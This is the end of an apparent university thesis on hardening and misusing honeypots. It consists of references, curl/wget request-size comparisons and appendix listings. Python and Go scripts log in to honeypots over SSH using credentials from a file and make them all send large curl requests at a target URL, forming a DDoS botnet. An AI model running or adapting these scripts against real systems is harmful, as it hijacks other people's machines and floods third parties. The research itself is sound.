GitLab. Behavorial fuzzing. Apr. 2023. URL: https : / / about . gitlab . com / topics /
devsecops/what-is-fuzz-testing/#two-types-of-fuzzing.
[18]
Gitlab. Coverage fuzzing. URL: https : / / docs . gitlab . com / ee / user / application _
security/coverage_fuzzing/.
[19]
Glastopf. URL: https://github.com/mushorg/glastopf.
[20]
Go. URL: https://go.dev/.
[21]
Go vs Python. URL: https://www.simplilearn.%20com/tutorials/golang- tutorial/
golang-vs-python..
[22]
Grok. URL: https://www.elastic.co/guide/en/elasticsearch/reference/7.8/grok-
processor.html.
[23]
Gunicorn. URL: https://gunicorn.org/.
[24]
Nazrul Hoque, Dhruba Kumar Bhattacharyya, and Jugal Kumar Kalita. “Botnet in
DDoS Attacks: Trends and Challenges”. In: IEEE Communications Surveys & Tu­
torials 17 (2015), pp. 2242–2270. URL: https://api.semanticscholar.org/CorpusID:
206576808.
[25]
Kaspersky. What is a botnet. Feb. 2024. URL: https://www.kaspersky.com/resource-
center/threats/botnet-attacks.
[26]
Kibana. URL: https://www.elastic.co/kibana.
[27]
LLVM. URL: https://llvm.org/.
[28]
Logstash. URL: https://www.elastic.co/logstash.
[29]
Tasnuva Mahjabin et al. “A survey of distributed denial­of­service attack, prevention,
and mitigation techniques”. In: International Journal of Distributed Sensor Networks
13.12 (2017), p. 1550147717741463. DOI: 10.1177/1550147717741463. eprint: https:
//doi.org/10.1177/1550147717741463. URL: https://doi.org/10.1177/1550147717741463.
[30]
Damian Menscher. Identifying and protecting against the largest ddos attacks |
google cloud blog. URL: https://cloud.google.com/blog/products/identity-security/
identifying-and-protecting-against-the-largest-ddos-attacks.
[31]
Nginx. URL: https://nginx.org/en/.
Hardening and misusing honeypots
29
==PAGE:38==
[32]
Nginx large request uri. URL: https://nginx.org/en/docs/http/ngx_http_core_
module.html#large_client_header_buffers.
[33]
OWASP. Fuzzing. URL: https://owasp.org/www-community/Fuzzing.
[34]
Owasp ZAP. URL: https://www.zaproxy.org/.
[35]
Paramiko documentation. URL: https://www.paramiko.org/.
[36]
PortSwigger. URL: https://portswigger.net/burp.
[37]
Vandana Verma Sehgal and PS Ambili. “A Taxonomy and Survey of Software Bill
of Materials (SBOM) Generation Approaches”. In: Analytics Global Conference.
Springer. 2023, pp. 40–51.
[38]
Shodan. URL: https://help.shodan.io/the-basics/what-is-shodan.
[39]
Shodan Honeyscore. URL: https://honeyscore.shodan.io/.
[40]
Slowloris DDoS attack — cloudflare.com. URL: https://www.cloudflare.com/learning/
ddos/ddos-attack-tools/slowloris/.
[41]
Pavol Sokol, Jakub Míšek, and Martin Husák. “Honeypots and honeynets: issues of
privacy”. In: EURASIP Journal on Multimedia and Information Security 2017.1 (Feb.
2017). DOI: 10.1186/s13635-017-0057-4. URL: https://doi.org/10.1186/s13635-017-
0057-4.
[42]
SonarQube. URL: https://www.sonarsource.com/products/sonarqube/.
[43]
Shreyas Srinivasa, Jens Myrup Pedersen, and Emmanouil Vasilomanolakis. “Gotta
catch ’em all: a Multistage Framework for honeypot fingerprinting”. eng. In: Digital
Threats: Research and Practice 4.3 (2023), p. 42. ISSN: 25765337, 26921626. DOI:
10.1145/3584976.
[44]
Yanbin Sun et al. “Honeypot Identification in Softwarized Industrial Cyber–Physical
Systems”. In: IEEE Transactions on Industrial Informatics 17.8 (2021), pp. 5542–
5551. DOI: 10.1109/TII.2020.3044576.
[45]
Supervisor. May 2024. URL: http://supervisord.org/.
[46]
T­pot. Dec. 2020. URL: https://github.com/telekom-security/tpotce.
[47]
Ghost Threat Research Team. An Attacker’s complete guide to evading honeypots.
Jan. 2024. URL: https://ghostsecurity.com/resources/blog/an-attackers-complete-
guide-to-evading-honeypots.
[48]
Tkinter. URL: https://docs.python.org/3/library/tkinter.html.
[49]
Urllib.parse. URL: https://docs.python.org/3/library/urllib.parse.html.
[50]
Alexander Vetterl and Richard Clayton. “Bitter harvest: systematically fingerprinting
low­ and medium­interaction honeypots at internet scale”. In: Proceedings of the
12th USENIX Conference on Offensive Technologies. WOOT’18. Baltimore, MD,
USA: USENIX Association, 2018, p. 9.
[51]
Wget. URL: https://www.gnu.org/software/wget/.
[52]
What is a DDoS Attack? URL: https://www.onelogin.com/learn/ddos-attack.
[53]
What is WSGI? ­ WSGI.org. URL: https://wsgi.readthedocs.io/en/latest/what.html.
30
Hardening and misusing honeypots
==PAGE:39==
A
Appendix
A.1
Curl and Wget comparison
A.1.1
Curl commands and results
1
curl -X {{method}} http://google.com
Listing A.1: Basic Curl command
Figure A.1: Total size of the requests with different HTTP methods using the command in
listing A.1
1
curl -X {{method}} http://google.com -H User-Agent: Mozilla/5.0 (Windows NT
6.0) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari
/537.11"
Listing A.2: Curl command with user agent
Hardening and misusing honeypots
31
==PAGE:40==
Figure A.2: Total size of the requests with different HTTP methods using the command in
listing A.2
A.1.2
Wget commands and results
1
wget --method=GET http://google.com
Listing A.3: Simple wget command
Figure A.3: Total size of the requests with different HTTP methods using the command in
listing A.3
1
header='--header=User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.11
(KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11'
2
wget --method={method} "$header" http://google.com/
Listing A.4: Wget command with a user agent
32
Hardening and misusing honeypots
==PAGE:41==
Figure A.4: Total size of the requests with different HTTP methods using the command in
listing A.4
A.2
Python script for honeypot misuse attack
1
import subprocess
2
import threading
3
import time
4
from paramiko import SSHClient , AutoAddPolicy
5
import requests
6
import urllib.parse
7
8
class SSHClientWrapper:
9
def __init__(self, ip, port, username , password):
10
self.ip = ip
11
self.port = port
12
self.username = username
13
self.password = password
14
self.client = None
15
16
def connect(self):
17
print(f"Connecting to machine: {self.ip}:{self.port}")
18
try:
19
self.client = SSHClient()
20
self.client.set_missing_host_key_policy(AutoAddPolicy())
21
self.client.connect(self.ip, port=self.port, username=self.
username , password=self.password , timeout=5)
22
print(f"Connected to machine: {self.ip}:{self.port}")
23
except Exception as e:
24
print(f"Failed to connect: {e}")
25
return
26
27
def execute_command(self, command):
28
print(f"Executing command: {command} on machine: {self.ip}:{self.port}
")
29
while True:
30
try:
31
stdin, stdout , stderr = self.client.exec_command(command)
32
output = stdout.read().decode("utf-8")
33
print(f"Command executed successfully on machine: {self.ip}:{
Hardening and misusing honeypots
33
==PAGE:42==
self.port}\nOutput: {output}")
34
time.sleep(5)
35
except Exception as e:
36
print(f"Failed to run command: {e}")
37
return
38
39
def get_lorem_ipsum(target_url ,num_paragraphs):
40
url = f"https://loripsum.net/api/{num_paragraphs}/plaintext"
41
42
try:
43
response = requests.get(url)
44
response.raise_for_status()
45
except requests.RequestException as e:
46
return None, e
47
48
text = []
49
with open("ipsum_text.txt", "r") as file:
50
for line in file:
51
text.append(line)
52
body = response.text
53
sanitized_text = body.replace(";", ",")
54
query_params = {'text': sanitized_text}
55
encoded_params = urllib.parse.urlencode(query_params)
56
57
new_url = f"{target_url}?{encoded_params}"
58
59
return new_url , None
60
61
62
def main():
63
target_url = "google.com"
64
clients = []
65
num_paragraphs = 5
66
lorem_ipsum , error = get_lorem_ipsum(target_url , num_paragraphs)
67
68
if error:
69
print(f"Error: {error}")
70
71
with open("honeypots.txt", "r") as file:
72
for line in file:
73
fields = line.strip().split(",")
74
clients.append(SSHClientWrapper(fields[0], fields[1], fields[2],
fields[3]))
75
76
def worker(client):
77
client.connect()
78
command = f"curl {lorem_ipsum}"
79
client.execute_command(command)
80
81
threads = []
82
for client in clients:
83
thread = threading.Thread(target=worker , args=(client ,))
84
threads.append(thread)
85
thread.start()
86
87
for thread in threads:
88
thread.join()
89
90
print("All tasks completed!")
91
92
if __name__ == "__main__":
93
main()
34
Hardening and misusing honeypots
==PAGE:43==
Listing A.5: Python script for DDoS honeypot botnet attack
A.3
Go script for DDoS honeypot botnet attack
1
package main
2
3
import (
4
"bufio"
5
"context"
6
"fmt"
7
"golang.org/x/crypto/ssh"
8
"io"
9
"net"
10
"net/http"
11
"net/url"
12
"os"
13
"strings"
14
"sync"
15
"time"
16
)
17
18
type SSHClient struct {
19
IP
string
20
Port
string
21
Username string
22
Password string
23
Client
*ssh.Client
24
}
25
26
var targetURL string = "http://google.com/"
27
28
func NewSSHClient(ip, port, username , password string) *SSHClient {
29
fmt.Printf("Creating new SSH client for machine: %s:%s\n", ip, port)
30
return &SSHClient{
31
IP:
ip,
32
Port:
port,
33
Username: username ,
34
Password: password ,
35
}
36
}
37
38
func (s *SSHClient) Connect(ctx context.Context) error {
39
fmt.Printf("Connecting to machine: %s:%s\n", s.IP, s.Port)
40
config := &ssh.ClientConfig{
41
User: s.Username ,
42
Auth: []ssh.AuthMethod{
43
ssh.Password(s.Password),
44
},
45
HostKeyCallback: ssh.InsecureIgnoreHostKey(),
46
Timeout:
5 * time.Second,
47
}
48
49
dialer := net.Dialer{}
50
conn, err := dialer.DialContext(ctx, "tcp", net.JoinHostPort(s.IP, s.Port))
51
if err != nil {
52
return fmt.Errorf("failed to dial: %v", err)
53
}
54
Hardening and misusing honeypots
35
==PAGE:44==
55
ncc, chans, reqs, err := ssh.NewClientConn(conn, net.JoinHostPort(s.IP, s.
Port), config)
56
if err != nil {
57
return fmt.Errorf("failed to create new SSH client connection: %v", err)
58
}
59
60
s.Client = ssh.NewClient(ncc, chans, reqs)
61
fmt.Printf("Connected to machine: %s:%s\n", s.IP, s.Port)
62
return nil
63
}
64
65
func (s *SSHClient) ExecuteCommand(command string) error {
66
fmt.Printf("Executing command: %s on machine: %s:%s\n", command , s.IP, s.
Port)
67
session , err := s.Client.NewSession()
68
if err != nil {
69
return fmt.Errorf("failed to create session: %v", err)
70
}
71
defer session.Close()
72
73
if err := session.Start(command); err != nil {
74
return fmt.Errorf("failed to run command: %v", err)
75
}
76
77
if err := session.Wait(); err != nil {
78
return fmt.Errorf("failed to wait for command completion: %v", err)
79
}
80
81
fmt.Printf("Command executed successfully on machine: %s:%s\n", s.IP, s.Port
)
82
return nil
83
}
84
85
func getLoremIpsum(numParagraphs int) (string , error) {
86
url := fmt.Sprintf("https://loripsum.net/api/%d/plaintext", numParagraphs)
87
response , err := http.Get(url)
88
if err != nil {
89
return "", err
90
}
91
defer response.Body.Close()
92
93
body, err := io.ReadAll(response.Body)
94
if err != nil {
95
return "", err
96
}
97
return string(body), nil
98
}
99
100
func main() {
101
var clients []*SSHClient
102
103
file, err := os.Open("honeypots.txt")
104
if err != nil {
105
fmt.Println("Error opening the file:", err)
106
return
107
}
108
defer file.Close()
109
110
scanner := bufio.NewScanner(file)
111
for scanner.Scan() {
112
line := scanner.Text()
113
fields := strings.Split(line, ",")
36
Hardening and misusing honeypots
==PAGE:45==
114
if len(fields) == 4 {
115
clients = append(clients , NewSSHClient(fields[0], fields[1], fields[2],
fields[3]))
116
}
117
}
118
119
var wg sync.WaitGroup
120
numToEachHoneypot := 1
121
numOfParagraphs := 5
122
123
loremIpsumText , err := getLoremIpsum(numOfParagraphs)
124
if err != nil {
125
fmt.Println("Error:", err)
126
return
127
}
128
129
for i := 0; i < numToEachHoneypot; i++ {
130
for _, client := range clients {
131
wg.Add(1)
132
go func(client *SSHClient) {
133
defer wg.Done()
134
135
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second
)
136
defer cancel()
137
138
if err := client.Connect(ctx); err != nil {
139
fmt.Println("Failed to connect: ", err)
140
return
141
}
142
143
urlEncodedText := url.QueryEscape(loremIpsumText)
144
command := fmt.Sprintf(`curl "%s?text=%s"`, targetURL , urlEncodedText)
145
if err := client.ExecuteCommand(command); err != nil {
146
fmt.Println("Failed to execute command: ", err)
147
}
148
149
client.Client.Close()
150
fmt.Printf("Disconnected from machine: %s:%s\n", client.IP, client.
Port)
151
}(client)
152
}
153
}
154
wg.Wait()
155
fmt.Println("All tasks completed!")
156
}
Listing A.6: Go script for DDoS honeypot bbotnet attack
Hardening and misusing honeypots
37
==PAGE:46==
Technical
University of
Denmark
Elektrovej, Building 324
2800 Kgs. Lyngby
Tlf. 4525 1700
www.compute.dtu.dk
